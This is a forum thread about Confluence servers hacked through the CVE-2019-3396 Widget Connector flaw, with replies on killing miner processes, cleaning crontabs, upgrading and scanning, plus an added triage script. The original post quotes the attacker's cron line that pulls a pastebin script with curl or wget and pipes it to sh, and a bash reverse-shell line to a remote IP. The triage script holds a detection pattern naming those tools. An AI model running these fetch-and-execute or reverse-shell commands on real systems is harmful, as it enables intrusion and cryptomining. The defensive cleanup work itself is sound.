WARNING - Confluence server hacked...

I'm running Confluence on two different systems; both were hacked. The hacker created a crontab file named /var/spool/cron/crontabs/confluence.

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Wed Apr 10 07:22:48 2019)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/10 * * * * (curl -fsSL https://pastebin.com/raw/v5XC0BJh||wget -q -O- https://pastebin.com/raw/v5XC0BJh)|sh


The cron job appears to open a bash session to a remote location.

bash -i >& /dev/tcp/45.76.191.111/2012 0>&

Is there a security fix?

7 answers

3 votes
Craig Castle-Mead
Rising Star
Apr 10, 2019

Hi Kevin,

What version(s) of Confluence are you running on these systems?

CCM

Craig Castle-Mead
Apr 10, 2019

There was a security alert put out recently (https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html) which includes 6.10.1 as one of the impacted versions.

As a first step, action the "Mitigation" items on the above page and then plan your upgrade ASAP.


CCM


I was able to stop it from reinserting the cronjob using root to

rm /var/spool/cron/crontabs/confluence && touch /var/spool/cron/crontabs/confluence

Does anyone know what the kerberods malware does? I haven't been able to find information about it.

I run Confluence with an unprivileged user, which is not a sudoer either. So I'm not sure what the extent of the damage is. The user that runs Confluence definitely has read/write permissions on the filesystem where the data is stored, although it's hard to say whether it would have access to the external database.

0 votes
Diego
Atlassian Team
Apr 16, 2019

Hello there! Just so that we have a full set of information about this situation, here goes:

Based on your version and symptoms, it sounds like your instance might be affected by an opportunistic attack against the CVE-2019-3396 Widget Connector vulnerability from March 20th (see Confluence Security Advisory - 2019-03-20). We've seen an infection going around that injects malware and the bitcoin miner it tries to run uses all the CPU available on the box. Initially the kerberods malware was being deployed as the payload, but other attacks might be trying to inject different payloads.

I'd recommend tackling things in this order:

  1. Kill malicious processes
  2. Clean up your crontab
  3. Upgrade Confluence
  4. Use a malware scanner to find remaining malware traces

Malicious processes

The top command will help you find processes (probably running under the confluence user account) that are consuming a large amount of CPU. If Confluence is currently stopped, you can probably plan on killing any processes running as the confluence user. Note the process ID (pid) from the top output and then kill the process using kill -9 followed by the pid. Example:

sudo kill -9 12395

Clean up your crontab

Since most malware adds a cronjob that relaunches the malware every few minutes, you'll also need to check the crontab file and remove any suspicious-looking entries. For Ubuntu, this is stored in the /var/spool/cron/crontabs/ directory. Normally you should use the crontab command to edit the crontab, but for cleanup purposes we'll be inspecting the file for any pre-existing entries.

Using vim (or whichever text editor you're comfortable with), you'll open the file and remove suspicious-looking jobs.

sudo vim /var/spool/cron/crontabs/confluence

Confluence comes up on system startup through the SysV/systemd daemons, so we would expect the confluence user's crontab to not exist under normal circumstances. It's most likely the case that any entries in this file are malicious, but make sure you check them before deleting them entirely.

Upgrade Confluence

Once your CPU is under control and new malicious processes aren't spawning, you need to upgrade Confluence to a version that isn't affected by the vulnerability. I'd recommend looking at one of these versions (latest releases as of this post):

Use a malware scanner

Finally, you need to clean up any remaining traces of malware on your system. The LSD malware cleanup tool will be useful for removing the Kerberods malware. Other malware payloads might need different cleanup tools depending on which attack and payload were used. A good starting place for detecting other types of infections are the scanners linked here. Once a particular infection is identified, googling for "____ removal tool" is a good place to start if the scanner was unable to remove the malware automatically.

I upgraded Confluence after the infection, so the infection remained.

My Confluence cronjob pointed to this one: https://pastebin.com/raw/Zk7Jv9j2

I used every command to see if anything is still running, so the important points:

  • cat the file /tmp/.XIMunix - it contains the PID of the main process (called scsi_eh_1 in my case)
  • rm /tmp/.XIMunix (I also deleted /tmp/.XIMunix)
  • Search everywhere for kerberods and delete it.

Currently, it seems no activity from that piece of junk is left. As everything was running as the confluence user, you can verify by ps'ing for that user.

What maybe helped me was that I deactivated password access for the root user.
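As an added triage helper, not code from this thread or from Atlassian, the following POSIX shell script applies the checks from Diego's steps 1 and 2 together with the /tmp/.XIMunix pid file mentioned above: it flags crontab lines that download and pipe into a shell or open /dev/tcp, reports whether the PID in the pid file is still alive, and lists the service account's processes by CPU. The crontab directory, the account name confluence and the pid-file path are assumptions taken from this thread's Ubuntu setup and can be overridden through environment variables.

```shell
#!/bin/sh
# Added triage helper (not from the thread). Defaults are assumptions
# based on the Ubuntu paths and the "confluence" account discussed above.
CRON_DIR="${CRON_DIR:-/var/spool/cron/crontabs}"
SVC_USER="${SVC_USER:-confluence}"
PIDFILE="${PIDFILE:-/tmp/.XIMunix}"

# Print crontab lines that fetch-and-execute (curl/wget piped to sh),
# reference pastebin, or open /dev/tcp. Comments and blank lines are skipped.
suspicious_cron_lines() {
    grep -v '^[[:space:]]*#' "$1" | grep -v '^[[:space:]]*$' \
      | grep -E -i 'curl|wget|pastebin|[|][[:space:]]*(ba)?sh([[:space:]]|$)|/dev/tcp'
}

# Exit 0 when the file exists and holds at least one suspicious line.
crontab_is_suspicious() {
    [ -f "$1" ] && [ -n "$(suspicious_cron_lines "$1")" ]
}

# Report the PID stored in the pid file and whether that process is alive.
pidfile_status() {
    [ -f "$1" ] || { echo "no pidfile at $1"; return 1; }
    pid=$(tr -cd '0-9' < "$1")
    if [ -n "$pid" ] && kill -0 "$pid" 2>/dev/null; then
        echo "pid $pid from $1 is RUNNING: $(ps -o comm= -p "$pid")"
    else
        echo "pid '$pid' from $1 is not running"
    fi
}

# Full host check: the service account should not own a crontab at all.
triage() {
    f="$CRON_DIR/$SVC_USER"
    if [ -e "$f" ]; then
        echo "crontab for $SVC_USER exists (unexpected for a service account):"
        crontab_is_suspicious "$f" && suspicious_cron_lines "$f"
    fi
    pidfile_status "$PIDFILE"
    echo "processes owned by $SVC_USER, highest CPU first:"
    ps -u "$SVC_USER" -o pid=,pcpu=,comm= 2>/dev/null | sort -k2 -rn | head
}
```

Run `triage` as root; a crontab that exists for the service account is itself a finding, and each flagged line should be inspected before the file is removed.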

Kimberly Deal _Columbus ACE_
Community Leader
Apr 15, 2019

*deactivated password access for the root user

Absolutely do this! The best way is to only allow su to root, and limit programs with root access.

Have the same issue with Confluence 6.12.2.

My symptoms: Confluence stops working, and every time I start/restart it, it is killed by the system(?)

Console logs - https://pastebin.com/2kAt8DU8

@Kevin Rodgers thanks!

0 votes
Gonchik Tsymzhitov
Community Leader
Apr 11, 2019

@Kevin Rodgers

A better way: also reinstall the OS, review your existing infrastructure, and change passwords.

 https://www.virustotal.com/cs/user/bartblaze/
